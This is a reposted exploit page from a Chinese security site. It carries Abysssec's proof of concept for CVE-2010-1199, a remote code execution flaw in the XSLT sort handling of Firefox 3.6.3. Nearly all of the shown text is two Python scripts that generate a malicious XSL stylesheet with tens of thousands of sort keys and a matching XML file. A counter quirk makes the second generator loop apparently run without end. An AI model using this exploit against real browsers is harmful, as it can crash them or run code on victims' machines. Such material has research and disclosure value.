首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability
来源:http://www.abysssec.com 作者:Abysssec 发布时间:2010-09-10  

'''
  __  __  ____         _    _ ____ 
 |  \/  |/ __ \   /\  | |  | |  _ \
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ <  Day 9 (Binary Analysis)
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/
 
 http://www.exploit-db.com/moaub-9-mozilla-firefox-xslt-sort-remote-code-execution-vulnerability/
 http://www.exploit-db.com/sploits/moaub-day9-ba.zip

'''

'''
  Title             : Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability
  Version           : Firefox 3.6.3
  Analysis          : http://www.abysssec.com
  Vendor            : http://www.mozilla.com
  Impact            : High/Critical
  Contact           : shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter           : @abysssec
  CVE               : CVE-2010-1199
'''
import sys;

myStyle = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="html"/>
<xsl:template match="/">
 <html>
  <head>
   <title>Beatles</title>
  </head>
  <body>
   <table border="1">
   <xsl:for-each select="beatles/beatle">
"""

BlockCount = 43000

count = 1
while(count<BlockCount):
    myStyle = myStyle + "<xsl:sort select='name/abysssec"+str(count)+"' order='descending'/>\n"
    count = count + 1

myStyle = myStyle +"""
    <tr>
    <td><a href="{@link}"><xsl:value-of select="name/lastname"/></a></td>
    <td><a href="{@link}"><xsl:value-of select="name/firstname"/></a></td>
    </tr>
   </xsl:for-each>
   </table>
  </body>
 </html>
</xsl:template>

</xsl:stylesheet>
    """
cssFile = open("abysssec.xsl","w")
cssFile.write(myStyle)
cssFile.close()

 

'''
  __  __  ____         _    _ ____ 
 |  \/  |/ __ \   /\  | |  | |  _ \
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ <
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/

'''

'''
  Title             : Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability
  Version           : Firefox 3.6.3
  Analysis          : http://www.abysssec.com
  Vendor            : http://www.mozilla.com
  Impact            : High/Critical
  Contact           : shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter           : @abysssec
  CVE               : CVE-2010-1199
  MOAUB Number      : MOAU_09_BA
'''
import sys;

myStyle = """<?xml version="1.0"?>
<?xml-stylesheet href="abysssec.xsl" type="text/xsl"?>
<beatles>

"""
block = """
 <beatle link="http://www.johnlennon.com">
  <name>
"""
BlockCount = 2147483647
rowCount=10
#myStyle = myStyle + "<tree id='mytree' flex='1' rows='"+str(rowCount)+"'>\n"
count = 1
while(count<BlockCount):
    myStyle = myStyle + """
 <beatle link="http://www.johnlennon.com">
    <name>
 """
    myStyle = myStyle + " <firstname>"+"A"*rowCount+"</firstname>\n"
    myStyle = myStyle + """
         <lastname>Lennon</lastname>
      </name>
     </beatle>
     <beatle link="http://www.paulmccartney.com">
      <name>"""

    myStyle = myStyle + " <firstname>"+"B"*rowCount+"</firstname>\n"
    myStyle = myStyle +  """   <lastname>McCartney</lastname>
      </name>
     </beatle>
     <beatle link="http://www.georgeharrison.com">
      <name>
      """
    myStyle = myStyle + " <firstname>"+"C"*rowCount+"</firstname>\n"
    myStyle = myStyle + """
       <lastname>Harrison</lastname>
      </name>
     </beatle>
     <beatle link="http://www.ringostarr.com">
      <name>
      """
    myStyle = myStyle + " <firstname>"+"D"*rowCount+"</firstname>\n"
    myStyle = myStyle + """
       <lastname>Starr</lastname>
      </name>
     </beatle>
     <beatle link="http://www.webucator.com" real="no">
      <name>
      """
    myStyle = myStyle + " <firstname>"+"E"*rowCount+"</firstname>\n"
    myStyle = myStyle +"""
       <lastname>Dunn</lastname>
      </name>
     </beatle>
 
    """
    count = count - 1

myStyle = myStyle +"""
    </beatles>
    """
cssFile = open("abyssssec.xml","w")
cssFile.write(myStyle)
cssFile.close()


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Acoustica MP3 Audio Mixer 2.47
·Adobe CoolType SING Table "uni
·Audiotran 1.4.2.4 SEH Overflow
·Java RMIConnectionImpl Deseria
·CS Cart 1.3.3 - Install.php XS
·FreeBSD 8.1/7.3 vm.pmap Kernel
·Process Hacker Dll Hijacking E
·Microsoft Office Visio DXF Fil
·Safari v5.0.1 DLL Hijacking (s
·Internet Explorer Dll Hijackin
·Beta Asp - Anket Database Disc
·SeaMonkey DLL Hijacking (dwmap
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved